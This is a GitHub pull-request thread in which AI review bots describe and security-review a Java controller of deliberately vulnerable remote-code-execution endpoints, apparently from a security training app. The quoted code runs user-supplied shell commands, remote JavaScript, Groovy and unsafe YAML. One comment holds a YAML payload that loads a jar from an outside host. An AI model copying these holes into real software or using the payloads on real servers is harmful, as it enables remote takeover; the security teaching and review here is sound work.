add Rce.java test qodo

[cccfeng]

No description provided.

[cccfeng]

@CodeRabbit pause

[coderabbitai]

✅ Actions performed

Reviews paused.

[cccfeng]

@CodiumAI-Agent /describe

[QodoAI-Agent]

Title

add Rce.java test qodo

---

PR Type

Enhancement

---

Description

• New RCE REST controller with multiple exec endpoints

• Command execution via Runtime and ProcessBuilder

• Script evaluation: JS, YAML (unsafe/safe), Groovy

• Demo main method for command touch

---

Changes walkthrough 📝

	Relevant files
Enhancement	Rce2.java Introduce RCE controller with various exec endpoints          src/main/java/org/joychou/controller/Rce2.java Introduce Rce controller class in org.joychou.controller Add /runtime/exec and /ProcessBuilder command exec endpoints Implement /jscmd, /vuln/yarm, /sec/yarm, /groovy script eval endpoints Include main method demo for runtime exec +138/-0

---

Need help?

Type /help how to ... in the comments thread for any questions about PR-Agent usage.

Check out the documentation for more information.

[cccfeng]

@CodiumAI-Agent /review

[QodoAI-Agent]

PR Reviewer Guide 🔍

Here are some key observations to aid the review process:

⏱️ Estimated effort to review: 2 🔵🔵⚪⚪⚪

🧪 No relevant tests

🔒 Security concerns Remote Code Execution: Multiple endpoints directly execute user-supplied content (shell commands, JavaScript, Groovy, YAML payloads) without any input validation or sandboxing, introducing severe RCE vulnerabilities.

⚡ Recommended focus areas for review Unrestricted Command Execution Endpoints CommandExec and processBuilder execute arbitrary shell commands from user input without validation or sanitization, allowing full RCE. @GetMapping("/runtime/exec") public String CommandExec(String cmd) { Runtime run = Runtime.getRuntime(); StringBuilder sb = new StringBuilder(); try { Process p = run.exec(cmd); BufferedInputStream in = new BufferedInputStream(p.getInputStream()); BufferedReader inBr = new BufferedReader(new InputStreamReader(in)); String tmpStr; while ((tmpStr = inBr.readLine()) != null) { sb.append(tmpStr); } if (p.waitFor() != 0) { if (p.exitValue() == 1) return "Command exec failed!!"; } inBr.close(); in.close(); } catch (Exception e) { return e.toString(); } return sb.toString(); } Insecure YAML Deserialization The yarm endpoint uses SnakeYAML's default loader to parse untrusted YAML content, exposing the application to deserialization attacks. @GetMapping("/vuln/yarm") public void yarm(String content) { Yaml y = new Yaml(); y.load(content); } Dynamic Script Evaluation Endpoints jscmd and groovyshell load and execute remote scripts via Nashorn and GroovyShell without sandboxing, enabling arbitrary code execution. @GetMapping("/jscmd") public void jsEngine(String jsurl) throws Exception{ // js nashorn javascript ecmascript ScriptEngine engine = new ScriptEngineManager().getEngineByName("js"); Bindings bindings = engine.getBindings(ScriptContext.ENGINE_SCOPE); String cmd = String.format("load(\"%s\")", jsurl); engine.eval(cmd, bindings); } /** * http://localhost:8080/rce/vuln/yarm?content=!!javax.script.ScriptEngineManager%20[!!java.net.URLClassLoader%20[[!!java.net.URL%20[%22http://test.joychou.org:8086/yaml-payload.jar%22]]]] * yaml-payload.jar: https://github.com/artsploit/yaml-payload * * @param content payloads */ @GetMapping("/vuln/yarm") public void yarm(String content) { Yaml y = new Yaml(); y.load(content); } @GetMapping("/sec/yarm") public void secYarm(String content) { Yaml y = new Yaml(new SafeConstructor()); y.load(content); } /** * http://localhost:8080/rce/groovy?content="open -a Calculator".execute() * @param content groovy shell */ @GetMapping("groovy") public void groovyshell(String content) { GroovyShell groovyShell = new GroovyShell(); groovyShell.evaluate(content); }